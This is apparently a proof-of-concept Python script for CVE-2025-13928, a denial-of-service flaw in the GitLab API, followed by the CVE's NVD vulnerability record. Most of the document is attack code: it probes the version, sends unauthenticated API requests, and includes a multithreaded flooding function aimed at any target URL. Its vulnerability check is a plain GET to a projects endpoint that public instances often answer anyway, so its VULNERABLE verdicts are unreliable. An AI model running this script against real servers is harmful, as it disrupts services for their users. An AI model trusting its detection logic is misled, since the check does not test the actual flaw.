CVE-2025-13928

# CVE-2025-13928 PoC - GitLab API Authorization Bypass DoS # Target: GitLab CE/EE < 18.6.4, < 18.7.2, < 18.8.2 # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import requests import sys import time from concurrent.futures import ThreadPoolExecutor, as_completed def check_gitlab_version(target_url): """Check if target GitLab version is vulnerable""" try: response = requests.get(f"{target_url}/api/v4/version", timeout=10) if response.status_code == 200: version_info = response.json() version = version_info.get('version', '') print(f"[*] Detected GitLab Version: {version}") return version except Exception as e: print(f"[!] Error checking version: {e}") return None def exploit_api_endpoint(target_url, endpoint): """Attempt to exploit the authorization bypass vulnerability""" headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-13928-PoC)', 'Content-Type': 'application/json' } try: # Attempt unauthenticated API request that should require authorization response = requests.get( f"{target_url}/api/v4/{endpoint}", headers=headers, timeout=5, allow_redirects=False ) # Check if authorization bypass occurred if response.status_code == 200: print(f"[!] VULNERABLE: Authorization bypass detected on {endpoint}") print(f"[*] Response preview: {response.text[:200]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[+] SAFE: Endpoint {endpoint} properly requires authorization") return False else: print(f"[*] Endpoint returned status {response.status_code}") return None except requests.exceptions.Timeout: print(f"[!] Request timeout on {endpoint} - possible DoS condition") return None except Exception as e: print(f"[!] Error exploiting {endpoint}: {e}") return None def dos_attack(target_url, endpoint, num_requests=100, threads=10): """Perform DoS attack by exploiting the vulnerability""" print(f"[*] Starting DoS attack with {num_requests} requests using {threads} threads") success_count = 0 with ThreadPoolExecutor(max_workers=threads) as executor: futures = [ executor.submit(exploit_api_endpoint, target_url, endpoint) for _ in range(num_requests) ] for future in as_completed(futures): result = future.result() if result: success_count += 1 print(f"[*] Attack completed. {success_count}/{num_requests} requests successful") return success_count def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-13928-poc.py <target_url> [endpoint]") print("Example: python cve-2025-13928-poc.py https://gitlab.example.com") sys.exit(1) target_url = sys.argv[1].rstrip('/') endpoint = sys.argv[2] if len(sys.argv) > 2 else 'projects' print(f"[*] Target: {target_url}") print(f"[*] Testing endpoint: {endpoint}") print("=" * 60) # Check version version = check_gitlab_version(target_url) if version: # Check if version is vulnerable version_parts = version.split('.') if len(version_parts) >= 3: major = int(version_parts[0]) minor = int(version_parts[1]) patch = int(version_parts[2]) is_vulnerable = False if major == 17 and minor >= 7: is_vulnerable = True elif major == 18: if minor < 6 or (minor == 6 and patch < 4): is_vulnerable = True elif minor == 7 and patch < 2: is_vulnerable = True elif minor == 8 and patch < 2: is_vulnerable = True if is_vulnerable: print("[!] Target appears to be VULNERABLE") else: print("[+] Target appears to be PATCHED") print("=" * 60) # Test for authorization bypass vulnerable = exploit_api_endpoint(target_url, endpoint) if vulnerable: print("\n[!] WARNING: Target is vulnerable to CVE-2025-13928") print("[*] Consider running DoS test (use responsibly):") print(f"[*] dos_attack('{target_url}', '{endpoint}', 50, 5)") print("\n[*] Remediation: Upgrade to GitLab 18.6.4, 18.7.2, or 18.8.2+") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-13928", "sourceIdentifier": "[email protected]", "published": "2026-01-22T15:16:47.603", "lastModified": "2026-01-26T21:08:36.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab CE/EE que afectaba a todas las versiones desde la 17.7 antes de la 18.6.4, la 18.7 antes de la 18.7.2 y la 18.8 antes de la 18.8.2, el cual podría haber permitido a un usuario no autenticado causar una condición de denegación de servicio al explotar una validación de autorización incorrecta en los puntos finales de la API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "17.7.0", "versionEndExcluding": "18.6.4", "matchCriteriaId": "53C19D00-8774-4DB1-8AFB-8C9596DC70F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.7.0", "versionEndExcluding": "18.6.4", "matchCriteriaId": "F87D62E6-4EB4-4E17-9CEA-E23219785C8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.7.0", "versionEndExcluding": "18.7.2", "matchCriteriaId": "7E36C974-4A52-424A-8758-E45B750C013E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.7.0", "versionEndExcluding": "18.7.2", "matchCriteriaId": "F71560B5-1000-45F1-8A5C-078D6C3D03E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.8.0", "versionEndExcluding": "18.8.2", "matchCriteriaId": "582D13A9-DEEE-4E3F-BFC5-61F270C99B86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.8.0", "versionEndExcluding": "18.8.2", "matchCriteriaId": "760BBB79-D5BD-4871-8522-3C2C7E65767B"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/582736", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3439441", "source": "[email protected]", "tags": ["Permissions Required"]}]}}